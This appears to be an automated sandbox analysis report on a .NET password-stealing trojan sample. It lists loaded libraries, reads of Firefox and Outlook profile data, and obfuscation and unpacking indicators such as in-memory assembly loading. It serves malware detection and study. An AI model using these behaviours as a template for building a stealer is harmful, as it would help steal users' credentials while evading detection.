                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, EZIYEA9L2ILVpWmM2J.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, fPvgG7swuttoZXeUIZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, fPvgG7swuttoZXeUIZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, EZIYEA9L2ILVpWmM2J.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, EZIYEA9L2ILVpWmM2J.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, EZIYEA9L2ILVpWmM2J.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, fPvgG7swuttoZXeUIZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@1/1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.logJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeMutant created: NULL
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeReversingLabs: Detection: 28%
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeVirustotal: Detection: 39%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe:Zone.IdentifierJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, MainForm.cs.Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{EIK[0],EIK[1],"Client"}}, (string[])null, (bool[])null)
                    .NET source code contains potential unpacker
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, EZIYEA9L2ILVpWmM2J.cs.Net Code: VI2S5Cwqb6 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, EZIYEA9L2ILVpWmM2J.cs.Net Code: VI2S5Cwqb6 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, EZIYEA9L2ILVpWmM2J.cs.Net Code: VI2S5Cwqb6 System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeCode function: 0_2_0812BB1D push FFFFFF8Bh; iretd 0_2_0812BB1F
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeStatic PE information: section name: .text entropy: 7.935386326287815
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, EZIYEA9L2ILVpWmM2J.csHigh entropy of concatenated method names: 'hl06tRCfAN', 'du26l2lLP3', 'jPb6QrCoW8', 'Om563hlv13', 'KPf6mGKIaP', 'npC6puPfK9', 'h966hcYvVK', 'VTB69EWZGq', 'rjU6XdKKHy', 'rnD6ngNEpG'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, fPvgG7swuttoZXeUIZ.csHigh entropy of concatenated method names: 'QbNQ8lRIC9', 'BO4QFreaop', 'XxxQ7Qnkfk', 'OU4QHurxiU', 'opaQYvhAa8', 'bRoQxmtw8u', 'nuZQvi1lQ1', 'hOLQ4UJFkb', 'zX3QTQCX1M', 'E03QyshSXd'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, ORmXg3yOriTsrTUdyW.csHigh entropy of concatenated method names: 'e5cqWsqhlI', 'aeqq6WaX8W', 'fkcqSvS6sB', 'Sglql1G9u3', 'gqlqQIAuE0', 'zDvqmFFKT3', 'aIXqpKJk3P', 'PMrLvB3USN', 'WhhL4mnIHN', 'KFZLTbJKLR'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, Ja7ioFzAH2H6C6rKgs.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qBHqB6pdpG', 'qYIqEvGTYn', 'jLxqePIhUP', 'SwyqkCeGUb', 'kM8qLVhnG5', 'hInqqpl4Yt', 'Pnqq1iRD07'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, iUD8OvW6KDahnuBa1fO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'u2R18v5dDq', 'vpo1FeQvBW', 'FPG17E48X0', 'J0v1Hey0Gd', 'B401YVrFJ4', 'LEO1xYwlaB', 'mOH1vfwo8a'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, hcCjKASHGWF1cTPFpZ.csHigh entropy of concatenated method names: 'AMlWhPvgG7', 'HutW9toZXe', 'AvYWnl9CrU', 'H7nWiIsXGS', 'MaYWE8PEWu', 'r7OWeDfIaE', 'yBDnlamQWFOYyJFuxv', 'JkvDcm5EgYlleZDGNW', 'Y14WWk6viR', 'BQnW6jLE2T'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, D42KFcxIYB6xRydGN0.csHigh entropy of concatenated method names: 'Gv6k4wP3tr', 'x2MkyYUstT', 'Id1LPtOLED', 'BXNLWiVwvo', 'cdQkUdhovJ', 'ElAkRgPtxR', 'wWsk0aaHhQ', 'x82k89l0v1', 'BZkkF6FmiI', 'MAYk7v3SRq'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, rwRyIOTlnujIfaaAIE.csHigh entropy of concatenated method names: 'IPILIcvbWF', 'shwLMhWMB8', 'wxWLwDfjcE', 'OFvLVodUfx', 'ULnL8Z2BtO', 'e0iLcKqGff', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, bVPQiFDyroeRdkP8fS.csHigh entropy of concatenated method names: 'BHD5l3pl1', 'dD3O9F6Ii', 'gRC2LEmFj', 'WXGZj5R9L', 'GjRKYqD1T', 'FGoAiS0Ia', 'X638AjTlRLLUKUxtj2', 'wtdDsEDAOmoJhanfm3', 'efsLMPNal', 'nKl13fQag'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, DXGSvdA3Y6vVeGaY8P.csHigh entropy of concatenated method names: 'LT2moaoof7', 'JNGmZUkmPo', 'aJF3wlWFeA', 'vvK3VTHFa4', 'NED3cDMBKJ', 's1b3fESni9', 'GRE3jvEDcf', 'RkF3uj2m0V', 'n7B3G83bkj', 'NNg3J1yoY0'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, dvulNw4iBkaeFrSDnA.csHigh entropy of concatenated method names: 'k6JLlh2Fn5', 'mxjLQelfwK', 'fuBL32bLhu', 'syFLmubgMn', 'u1cLp8ukDO', 'zSLLhsrZII', 'ahoL9w16hx', 'FX0LXlxTfQ', 'Y0HLnE0RiW', 'l9qLid7aYl'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, BxjMHJjAaclTuYFA31.csHigh entropy of concatenated method names: 'uHEhlf61Wl', 'ifjh3FZy4g', 'yE9hp4w3Z5', 'EXppyeQypv', 'SQIpzbKu2T', 'LJJhPDS50S', 'ivqhWrf83q', 'g3WhD5rYrF', 'PZph6AsWXT', 'WgwhSfoMYd'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, sIirkVM8t1ejbhLhXr.csHigh entropy of concatenated method names: 'JQL5asNRat1uSVuU9FC', 'HJAVKbNwpvrBTdU2pYs', 'M8SeokNQqZxaF33lIo8', 'dqWpLsIG0M', 'JU0pq7CZ2Q', 'PQdp1HfUjt', 'RcwliqNsj1JMuAEx1s7', 'SIZpbwNGWfwjvMfLS1y'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, kO0PeOKvYl9CrUw7nI.csHigh entropy of concatenated method names: 'ehc3Oil0X3', 'qqx32kKU4Q', 'NGl3s4wIef', 'iQa3KuVklv', 'gAP3EKmd9O', 'uP93eWsg8Z', 'Gd33kqc71B', 'usn3LZnNZC', 'Lm53qmCXka', 'wY43117XJg'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, nj8CIy7UkDgJlnsAA8.csHigh entropy of concatenated method names: 'ToString', 'cFneUDEodN', 'EneeM1MV8i', 'lWpewNPVtG', 'IEkeVjUV9Q', 'zLnecVwVG8', 'z0SefjxQVJ', 'OXmejC7W3R', 'JTneuKcgyA', 'WtbeGaMtIY'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, FLm1IIQZ2raRLRjPmL.csHigh entropy of concatenated method names: 'Dispose', 'CMBWT69JZn', 'e7KDMHmra2', 'MwKggIqaXb', 'WSvWyulNwi', 'nkaWzeFrSD', 'ProcessDialogKey', 'lALDPwRyIO', 'fnuDWjIfaa', 'FIEDDURmXg'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, Vus40WWPY4tv91QueSt.csHigh entropy of concatenated method names: 'PSdqbmFb3T', 'kYpqaKhwwn', 'aZaq5AaKeF', 'uDbqOA8cxw', 'WUkqoL3lMV', 'Oq2q22t4lI', 'TQaqZMQftZ', 'Q26qsbdDQS', 'QryqK5a9w7', 'SydqArDAOL'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, q1OrjN3HMV0MbPAoNU.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'gY8DTwRQQO', 'VcYDy4vP4d', 'wh6DzJjdUc', 'XjH6PkHnyr', 'uXZ6WIHOMR', 'xEP6DT0dVM', 'Ebo66Py3om', 'CuCmxrZ2HRAjmtG1Hl4'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, oWuL7OIDfIaE02x2wB.csHigh entropy of concatenated method names: 'B7Fpt39LWi', 'sIppQ6pVPl', 'GWipmEJHPX', 'gPJphxfPSG', 'lJyp9XPTbV', 'DPrmYjc8k8', 'lr4mxHnUNq', 'DvymvuloGW', 'ngLm4oImh5', 'rC9mTVW4PG'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, S3PGAnG8KjmOX9EZUq.csHigh entropy of concatenated method names: 'oQghb2NscV', 'iKchatavlW', 'DKch5VX9rM', 'AT9hOmyGOT', 'fsshoWmrct', 'tO9h2pjT9N', 'mVqhZUGPvA', 'kgqhsAH1lO', 'J86hKggvhL', 'RPihArqQpp'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, nS1vfe0bkY5G2t9q20.csHigh entropy of concatenated method names: 'E1wBsKKQKb', 'kSTBKCXuwO', 'NJnBIiQQY8', 'NV3BM3LZBU', 'YX7BVCWaZj', 'fNHBcLPuYA', 'hOpBjw8Md4', 'gRTBuFwLBq', 'XxKBJS8B2v', 'AbWBUtwr8d'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, E33hcSHIxISvMgLylX.csHigh entropy of concatenated method names: 'B02knqhyui', 'i7bki4gTJs', 'ToString', 'MVVklwidUE', 'jhbkQnAS6n', 'n09k3Toycv', 'IywkmP3gRA', 'sSHkp9Wba9', 'xJVkhGi3gE', 'IhFk9ROjtW'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, EZIYEA9L2ILVpWmM2J.csHigh entropy of concatenated method names: 'hl06tRCfAN', 'du26l2lLP3', 'jPb6QrCoW8', 'Om563hlv13', 'KPf6mGKIaP', 'npC6puPfK9', 'h966hcYvVK', 'VTB69EWZGq', 'rjU6XdKKHy', 'rnD6ngNEpG'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, fPvgG7swuttoZXeUIZ.csHigh entropy of concatenated method names: 'QbNQ8lRIC9', 'BO4QFreaop', 'XxxQ7Qnkfk', 'OU4QHurxiU', 'opaQYvhAa8', 'bRoQxmtw8u', 'nuZQvi1lQ1', 'hOLQ4UJFkb', 'zX3QTQCX1M', 'E03QyshSXd'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, ORmXg3yOriTsrTUdyW.csHigh entropy of concatenated method names: 'e5cqWsqhlI', 'aeqq6WaX8W', 'fkcqSvS6sB', 'Sglql1G9u3', 'gqlqQIAuE0', 'zDvqmFFKT3', 'aIXqpKJk3P', 'PMrLvB3USN', 'WhhL4mnIHN', 'KFZLTbJKLR'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, Ja7ioFzAH2H6C6rKgs.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qBHqB6pdpG', 'qYIqEvGTYn', 'jLxqePIhUP', 'SwyqkCeGUb', 'kM8qLVhnG5', 'hInqqpl4Yt', 'Pnqq1iRD07'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, iUD8OvW6KDahnuBa1fO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'u2R18v5dDq', 'vpo1FeQvBW', 'FPG17E48X0', 'J0v1Hey0Gd', 'B401YVrFJ4', 'LEO1xYwlaB', 'mOH1vfwo8a'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, hcCjKASHGWF1cTPFpZ.csHigh entropy of concatenated method names: 'AMlWhPvgG7', 'HutW9toZXe', 'AvYWnl9CrU', 'H7nWiIsXGS', 'MaYWE8PEWu', 'r7OWeDfIaE', 'yBDnlamQWFOYyJFuxv', 'JkvDcm5EgYlleZDGNW', 'Y14WWk6viR', 'BQnW6jLE2T'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, D42KFcxIYB6xRydGN0.csHigh entropy of concatenated method names: 'Gv6k4wP3tr', 'x2MkyYUstT', 'Id1LPtOLED', 'BXNLWiVwvo', 'cdQkUdhovJ', 'ElAkRgPtxR', 'wWsk0aaHhQ', 'x82k89l0v1', 'BZkkF6FmiI', 'MAYk7v3SRq'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, rwRyIOTlnujIfaaAIE.csHigh entropy of concatenated method names: 'IPILIcvbWF', 'shwLMhWMB8', 'wxWLwDfjcE', 'OFvLVodUfx', 'ULnL8Z2BtO', 'e0iLcKqGff', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, bVPQiFDyroeRdkP8fS.csHigh entropy of concatenated method names: 'BHD5l3pl1', 'dD3O9F6Ii', 'gRC2LEmFj', 'WXGZj5R9L', 'GjRKYqD1T', 'FGoAiS0Ia', 'X638AjTlRLLUKUxtj2', 'wtdDsEDAOmoJhanfm3', 'efsLMPNal', 'nKl13fQag'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, DXGSvdA3Y6vVeGaY8P.csHigh entropy of concatenated method names: 'LT2moaoof7', 'JNGmZUkmPo', 'aJF3wlWFeA', 'vvK3VTHFa4', 'NED3cDMBKJ', 's1b3fESni9', 'GRE3jvEDcf', 'RkF3uj2m0V', 'n7B3G83bkj', 'NNg3J1yoY0'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, dvulNw4iBkaeFrSDnA.csHigh entropy of concatenated method names: 'k6JLlh2Fn5', 'mxjLQelfwK', 'fuBL32bLhu', 'syFLmubgMn', 'u1cLp8ukDO', 'zSLLhsrZII', 'ahoL9w16hx', 'FX0LXlxTfQ', 'Y0HLnE0RiW', 'l9qLid7aYl'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, BxjMHJjAaclTuYFA31.csHigh entropy of concatenated method names: 'uHEhlf61Wl', 'ifjh3FZy4g', 'yE9hp4w3Z5', 'EXppyeQypv', 'SQIpzbKu2T', 'LJJhPDS50S', 'ivqhWrf83q', 'g3WhD5rYrF', 'PZph6AsWXT', 'WgwhSfoMYd'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, sIirkVM8t1ejbhLhXr.csHigh entropy of concatenated method names: 'JQL5asNRat1uSVuU9FC', 'HJAVKbNwpvrBTdU2pYs', 'M8SeokNQqZxaF33lIo8', 'dqWpLsIG0M', 'JU0pq7CZ2Q', 'PQdp1HfUjt', 'RcwliqNsj1JMuAEx1s7', 'SIZpbwNGWfwjvMfLS1y'
